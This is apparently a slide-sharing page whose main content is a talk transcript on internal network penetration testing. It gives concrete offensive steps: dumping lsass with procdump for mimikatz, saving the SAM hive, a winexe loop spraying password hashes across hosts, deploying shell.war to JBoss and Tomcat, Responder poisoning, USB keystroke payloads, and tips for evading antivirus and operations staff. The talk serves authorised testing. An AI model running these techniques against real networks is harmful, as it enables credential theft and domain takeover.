SpotFlow: Tracking Method Calls and States at RuntimeSpotFlow: Tracking Method Calls and States at Runtime
SpotFlow: Tracking Method Calls and States at Runtimeandrehoraa
 
Patterns for automating API delivery. API conference
Patterns for automating API delivery. API conferencePatterns for automating API delivery. API conference
Patterns for automating API delivery. API conferencessuser9e7c64
 
A healthy diet for your Java application Devoxx France.pdf
A healthy diet for your Java application Devoxx France.pdfA healthy diet for your Java application Devoxx France.pdf
A healthy diet for your Java application Devoxx France.pdfMarharyta Nedzelska
 
2024 DevNexus Patterns for Resiliency: Shuffle shards
2024 DevNexus Patterns for Resiliency: Shuffle shards2024 DevNexus Patterns for Resiliency: Shuffle shards
2024 DevNexus Patterns for Resiliency: Shuffle shardsChristopher Curtin
 
Amazon Bedrock in Action - presentation of the Bedrock's capabilities
Amazon Bedrock in Action - presentation of the Bedrock's capabilitiesAmazon Bedrock in Action - presentation of the Bedrock's capabilities
Amazon Bedrock in Action - presentation of the Bedrock's capabilitiesKrzysztofKkol1
 
Tech Tuesday - Mastering Time Management Unlock the Power of OnePlan's Timesh...
Tech Tuesday - Mastering Time Management Unlock the Power of OnePlan's Timesh...Tech Tuesday - Mastering Time Management Unlock the Power of OnePlan's Timesh...
Tech Tuesday - Mastering Time Management Unlock the Power of OnePlan's Timesh...OnePlan Solutions
 
Real-time Tracking and Monitoring with Cargo Cloud Solutions.pptx
Real-time Tracking and Monitoring with Cargo Cloud Solutions.pptxReal-time Tracking and Monitoring with Cargo Cloud Solutions.pptx
Real-time Tracking and Monitoring with Cargo Cloud Solutions.pptxRTS corp
 
Revolutionizing the Digital Transformation Office - Leveraging OnePlan’s AI a...
Revolutionizing the Digital Transformation Office - Leveraging OnePlan’s AI a...Revolutionizing the Digital Transformation Office - Leveraging OnePlan’s AI a...
Revolutionizing the Digital Transformation Office - Leveraging OnePlan’s AI a...OnePlan Solutions
 
Effectively Troubleshoot 9 Types of OutOfMemoryError
Effectively Troubleshoot 9 Types of OutOfMemoryErrorEffectively Troubleshoot 9 Types of OutOfMemoryError
Effectively Troubleshoot 9 Types of OutOfMemoryErrorTier1 app
 
OpenChain AI Study Group - Europe and Asia Recap - 2024-04-11 - Full Recording
OpenChain AI Study Group - Europe and Asia Recap - 2024-04-11 - Full RecordingOpenChain AI Study Group - Europe and Asia Recap - 2024-04-11 - Full Recording
OpenChain AI Study Group - Europe and Asia Recap - 2024-04-11 - Full RecordingShane Coughlan
 
Simplifying Microservices & Apps - The art of effortless development - Meetup...
Simplifying Microservices & Apps - The art of effortless development - Meetup...Simplifying Microservices & Apps - The art of effortless development - Meetup...
Simplifying Microservices & Apps - The art of effortless development - Meetup...Rob Geurden
 
Odoo 14 - eLearning Module In Odoo 14 Enterprise
Odoo 14 - eLearning Module In Odoo 14 EnterpriseOdoo 14 - eLearning Module In Odoo 14 Enterprise
Odoo 14 - eLearning Module In Odoo 14 Enterprisepreethippts
 
Comparing Linux OS Image Update Models - EOSS 2024.pdf
Comparing Linux OS Image Update Models - EOSS 2024.pdfComparing Linux OS Image Update Models - EOSS 2024.pdf
Comparing Linux OS Image Update Models - EOSS 2024.pdfDrew Moseley
 
eSoftTools IMAP Backup Software and migration tools
eSoftTools IMAP Backup Software and migration toolseSoftTools IMAP Backup Software and migration tools
eSoftTools IMAP Backup Software and migration toolsosttopstonverter
 
SoftTeco - Software Development Company Profile
SoftTeco - Software Development Company ProfileSoftTeco - Software Development Company Profile
SoftTeco - Software Development Company Profileakrivarotava
 
VictoriaMetrics Anomaly Detection Updates: Q1 2024
VictoriaMetrics Anomaly Detection Updates: Q1 2024VictoriaMetrics Anomaly Detection Updates: Q1 2024
VictoriaMetrics Anomaly Detection Updates: Q1 2024VictoriaMetrics
 
The Role of IoT and Sensor Technology in Cargo Cloud Solutions.pptx
The Role of IoT and Sensor Technology in Cargo Cloud Solutions.pptxThe Role of IoT and Sensor Technology in Cargo Cloud Solutions.pptx
The Role of IoT and Sensor Technology in Cargo Cloud Solutions.pptxRTS corp
 

Recently uploaded (20)

Introduction to Firebase Workshop Slides
Introduction to Firebase Workshop SlidesIntroduction to Firebase Workshop Slides
Introduction to Firebase Workshop Slides
 
SensoDat: Simulation-based Sensor Dataset of Self-driving Cars
SensoDat: Simulation-based Sensor Dataset of Self-driving CarsSensoDat: Simulation-based Sensor Dataset of Self-driving Cars
SensoDat: Simulation-based Sensor Dataset of Self-driving Cars
 
Not a Kubernetes fan? The state of PaaS in 2024
Not a Kubernetes fan? The state of PaaS in 2024Not a Kubernetes fan? The state of PaaS in 2024
Not a Kubernetes fan? The state of PaaS in 2024
 
SpotFlow: Tracking Method Calls and States at Runtime
SpotFlow: Tracking Method Calls and States at RuntimeSpotFlow: Tracking Method Calls and States at Runtime
SpotFlow: Tracking Method Calls and States at Runtime
 
Patterns for automating API delivery. API conference
Patterns for automating API delivery. API conferencePatterns for automating API delivery. API conference
Patterns for automating API delivery. API conference
 
A healthy diet for your Java application Devoxx France.pdf
A healthy diet for your Java application Devoxx France.pdfA healthy diet for your Java application Devoxx France.pdf
A healthy diet for your Java application Devoxx France.pdf
 
2024 DevNexus Patterns for Resiliency: Shuffle shards
2024 DevNexus Patterns for Resiliency: Shuffle shards2024 DevNexus Patterns for Resiliency: Shuffle shards
2024 DevNexus Patterns for Resiliency: Shuffle shards
 
Amazon Bedrock in Action - presentation of the Bedrock's capabilities
Amazon Bedrock in Action - presentation of the Bedrock's capabilitiesAmazon Bedrock in Action - presentation of the Bedrock's capabilities
Amazon Bedrock in Action - presentation of the Bedrock's capabilities
 
Tech Tuesday - Mastering Time Management Unlock the Power of OnePlan's Timesh...
Tech Tuesday - Mastering Time Management Unlock the Power of OnePlan's Timesh...Tech Tuesday - Mastering Time Management Unlock the Power of OnePlan's Timesh...
Tech Tuesday - Mastering Time Management Unlock the Power of OnePlan's Timesh...
 
Real-time Tracking and Monitoring with Cargo Cloud Solutions.pptx
Real-time Tracking and Monitoring with Cargo Cloud Solutions.pptxReal-time Tracking and Monitoring with Cargo Cloud Solutions.pptx
Real-time Tracking and Monitoring with Cargo Cloud Solutions.pptx
 
Revolutionizing the Digital Transformation Office - Leveraging OnePlan’s AI a...
Revolutionizing the Digital Transformation Office - Leveraging OnePlan’s AI a...Revolutionizing the Digital Transformation Office - Leveraging OnePlan’s AI a...
Revolutionizing the Digital Transformation Office - Leveraging OnePlan’s AI a...
 
Effectively Troubleshoot 9 Types of OutOfMemoryError
Effectively Troubleshoot 9 Types of OutOfMemoryErrorEffectively Troubleshoot 9 Types of OutOfMemoryError
Effectively Troubleshoot 9 Types of OutOfMemoryError
 
OpenChain AI Study Group - Europe and Asia Recap - 2024-04-11 - Full Recording
OpenChain AI Study Group - Europe and Asia Recap - 2024-04-11 - Full RecordingOpenChain AI Study Group - Europe and Asia Recap - 2024-04-11 - Full Recording
OpenChain AI Study Group - Europe and Asia Recap - 2024-04-11 - Full Recording
 
Simplifying Microservices & Apps - The art of effortless development - Meetup...
Simplifying Microservices & Apps - The art of effortless development - Meetup...Simplifying Microservices & Apps - The art of effortless development - Meetup...
Simplifying Microservices & Apps - The art of effortless development - Meetup...
 
Odoo 14 - eLearning Module In Odoo 14 Enterprise
Odoo 14 - eLearning Module In Odoo 14 EnterpriseOdoo 14 - eLearning Module In Odoo 14 Enterprise
Odoo 14 - eLearning Module In Odoo 14 Enterprise
 
Comparing Linux OS Image Update Models - EOSS 2024.pdf
Comparing Linux OS Image Update Models - EOSS 2024.pdfComparing Linux OS Image Update Models - EOSS 2024.pdf
Comparing Linux OS Image Update Models - EOSS 2024.pdf
 
eSoftTools IMAP Backup Software and migration tools
eSoftTools IMAP Backup Software and migration toolseSoftTools IMAP Backup Software and migration tools
eSoftTools IMAP Backup Software and migration tools
 
SoftTeco - Software Development Company Profile
SoftTeco - Software Development Company ProfileSoftTeco - Software Development Company Profile
SoftTeco - Software Development Company Profile
 
VictoriaMetrics Anomaly Detection Updates: Q1 2024
VictoriaMetrics Anomaly Detection Updates: Q1 2024VictoriaMetrics Anomaly Detection Updates: Q1 2024
VictoriaMetrics Anomaly Detection Updates: Q1 2024
 
The Role of IoT and Sensor Technology in Cargo Cloud Solutions.pptx
The Role of IoT and Sensor Technology in Cargo Cloud Solutions.pptxThe Role of IoT and Sensor Technology in Cargo Cloud Solutions.pptx
The Role of IoT and Sensor Technology in Cargo Cloud Solutions.pptx
 

Why internal pen tests are still fun

  • 1. Why Internal Pen-Tests are still FUN !
  • 2. Why other pen-tests suck ! (not hating) • External – Unless your SE’ing someone its pretty boring. (nessus/qualys grepping human thou art l33t) • Web Apps – Unless you get SQLi or file upload or good business logic bugs. (Oh burp scanning/intruder ninja thou art l33t) • Mobile – Fun unlimited but limited by small threat surface
  • 3. Internal Pen-Tests • SHELLS! SHELLS! SHELLS! – Oh beautiful Shellness! • Nothing beats the joy of popping a box ! • If Local Admin get Domain admin – always a new challenge ! • Data – Oh delicious customer data ! • Mad respect from client “More pen-tests…more monnneeyyy” – Hans Michael Varbaek
  • 4. Why we still own Internal Networks • Weak passwords – Welcome1 still works in 2013
  • 5. Why we still own Internal Networks • No patching – MS08-67 still works in 2013
  • 6. Why we still own Internal Networks • No access controls – RDP/SSH anywhere
  • 7. Easy Pwnage • This stuff still works not because your l33t but because your customer is clueless about securing stuff. – Password attacks • SMB bruteforce from list of domain users (null sessions or using compromised host that gave you a domain user cred) • ^ check password policy before going haywire. • SSH, MSSQL etc (sa,sa still works in 2013) • Metasploit auxillary modules / Nmap scripts are your best friend. (you know most of the good ones r8 ?) • Run all of them if you’ve got time. You never know how low the fruit is hanging unless you bend down. • Nessus/Qualys generally are pretty bad at brueforcing stuff. • Use intelligent word lists – mixin company name
  • 8. Easy Pwnage – Not Patching • Any vulnerable software that Qualys/Nessus finds - if metasploit has a module for it = easy win. – Web consoles (I like these – find them all the time!) • Jboss JMX consoles (setup shell.war and invoke) • Tomcat manager (deploy shell.war) – These usually run as SYSTEM on a windows box. • Any file upload from a web app that is internal (Don’t waste time on this, if you do see something interesting have a poke) – GPO cpassword (Group Policy Preference XML) • post/windows/gather/credentials/gpp – de base 64 and then decrypt using MS provided public AES key • Most likely local administrator password (re-used across all hosts that were deployed with GPPs)
  • 9. Easy Pwnage Filebrowser -> when cmd.jsp gets picked up by AV http://www.vonloesch.de/filebrowser.html
  • 13. Why are we doing all this anyway ?? • Get sensitive data and show customer the real risk of allowing “Mr.Evil” to connect to their internal network – Hunting for data : • Local admin -> Domain Admin -> Search for data everywhere (usually databases – unless they're really stupid and store it in unencrypted flat files) Lesson learnt – Some clients don’t even know what data is important to them. - CEO’s Mailbox is a good start
  • 14. Super Secure Customer • Everything is patched • Super random awesomely strong passwords • Apps are secure coded – no SQLi and no file upload • AV everywhere – I mean everywhere • ^ AV cant be turned off unless you provide password • OMG ! – I should quit pen-testing.
  • 15.
  • 16. Responder • Developed by Laurent Gaffié (Trustwave) • LLMNR and NBT-NS poisoning (Google for what this) – If DNS and hosts file fails, tool yells out saying I’ll resolve that for you and then steals your creds ! – DEMO – Hashes can be cracked via John or can be relayed: http://pen-testing.sans.org/blog/pen- testing/2013/04/25/smb-relay-demystified-and-ntlmv2- pwnage-with-python
  • 17. Responder • Tons of other features – Google “responder trustwave” – Does ICMP re-direct (this is effing awesome – but only works for anything older than Vista/2k8) – Abuse WPAD (Another kool feature) – HTTP, FTP module. • Make sure you are on a workstation subnet for maximum hits.
  • 18. OK – THAT DINT WORK ?? • Give up and go home ??
  • 19. I SAY NO ! • Meet the angry, I will pwn you pentester !
  • 20. Get your Ducky on • HID usb thingy that has a small programmable chip. • When user leaves desktop/laptop unlocked run and connect. (or walk if your not that enthusiastic) • Quickly add user, enable rdp, grab password hashes, system info etc and ship to ur ftp server. (whatever privs user has – ducky has) • Easy to write scripts – write, compile with java load onto Ducky. • ^ Way easier than teensy – Although teensy can be used in stealth/SE tactics. Teensy inside mouse, teensy inside keyboard etc.
  • 21. DUCKY DEMO • If it quacks like a duck – it must be a duck • Video
  • 22. SAFE PASSWORD DUMPING • Old school password dumping tools get picked by AV (cain, pwdump etc) • New ones are getting picked up as well (WCE, mimikatz etc) – These two can dump plain- text passwords from memory. • Disable AV ? • What if AV can only be disabled using a password ?
  • 23. SAFE PASSWORD DUMPING • You don’t have to disable AV or trigger it. • Procdump from sysinternals – C:windowstempprocdump.exe -accepteula -ma lsass.exe C:windowstemplsassdump.dmp – Mimikatz can then chew the .dmp file and spit out passwords in clear text.
  • 24. SAFE PASSWORD DUMPING • Some old methods still work and don’t get picked by AV – hashes from hives: • Reg copy (C:>reg.exe save HKLMSAM sam) • Shadow volume copy (good to grab NTDIS) • ^ Ops guy now do check logs for shadow volume copies and so I’d recommend using SAMEX. (http://www.josho.org/blog//blog/2013/03/0 7/samex/)
  • 25. Searching for Domain Admin • So you popped a few boxes - got some hashes • What now ? • If one of those boxes : – had a domain admin logged in – you have his password in plain-text or got his hash -> game over. – had a service running as domain admin – move to process, pop shell -> game over. • Shares the same local administrator password across the network. – Spray the hash and look for boxes with processes running as domain admin.
  • 26. Searching for Domain Admin #!/bin/sh for ip in $(cat ip.txt);do ./winexe -U Administrator%passwordhash //$ip "ipconfig" ./winexe -U Administrator%passwordhash //$ip "tasklist /v" Done • ^ Metasploit module auxiliary/admin/smb/psexec_command also works. Do not use windows/smb/psexec as this uploads an exe to the box and will trigger AV. • Login to box running the domain admin process – dump hash or read from lsass as plain text. • Replay hash or login as domain admin over RDP etc. • Game over. – Pro Stealth tip : Once you get a domain admin shell DO NOT CREATE a new domain admin user. • This will trigger Ops as a lot of organisations are alerted if a new domain administrator is created.
  • 27. Looting • Go after SQL servers – you should have a list of these from your scans • Shares – Yes people still store heaps of confidential stuff unencrypted in shares • Have you guys seen Firefox PTH ? – All ur OWA and sharepoint r belong 2 us ! • Metasploit – post exploitation modules – store loot in MSF DB for grepping later.
  • 28. Firefox PTH • DEMO • https://code.google.com/p/passing-the- hash/downloads/list
  • 29. Mitigations • You cant really stop a determined attacker • There are just way too many ways you could get hacked • Best bet is to detect • Check anomalies – New user creation (DA etc), Local admin logons, AV pickups etc • User education • Google’s new n/w architecture – All zones are untrust (Not a bad idea eh ?) • Obvious old school protections should still apply – Patching, strong passwords, access controls etc
  • 30. Testing “Pro” tips • Don’t leave any accounts you create on customer’s network – delete everything (Finding DA account by pen-tester in last engagement = fail) • Bruteforce wisely – locking out an important service will not go down well with a customer (Bump down threads = increase stealth) • Don’t disable AV – Intelligent Ops are alerted if AV dies • Wipe your VM after every pen-test – A clean slate to work on is so much better • Snapshotting to have all your tools set-up and then reset also works • Script for linux is your best friend • Notes – always good for other eyes trying to read and understand what you did (doesn’t even have to be fancy - Vi or notepad works) • Videos for complex attacks – I’d highly recommend it (mind you this is gonna eat some disk space and sending this to a client might be difficult)
  • 31. Music (Ignore slide if you don’t listen to music) • Messhugah, Lamb of God and Tool - when ur feeling effing awesome and pwning like a baws • Trying really hard for a breakthrough or fighting a problem – Really fast techno or dubstep • When you lose it and wanna break your laptop – Vitamin string quartet (trust me this works)
  • 32. That’s it • Things I want to work on (any help will earn beers and respect): – Write more ducky scripts (hopefully run faster and grab more stuff, reverse shell etc) – Write post exploit modules (which can loot more efficiently) – Setup a Pi that can do all this over 3/4g to be sent to client so I can watch BSG and sip beer. – Hope this helped. Google for anything that I may have not provided a link or explained in detail Blog: http://psychsec.wordpress.com/

Editor's Notes

  1. Windows =< 5.2 Domain members (XP, Windows server 2003 and above) have ICMP Redirect enabled by default. This functionality can be used to remotely add (with no authentication required) a new route for a given host.   So basically, anything older than Windows Vista / Server 2008 is vulnerable. You just send it an ICMP redirect, and shiz gets redirected.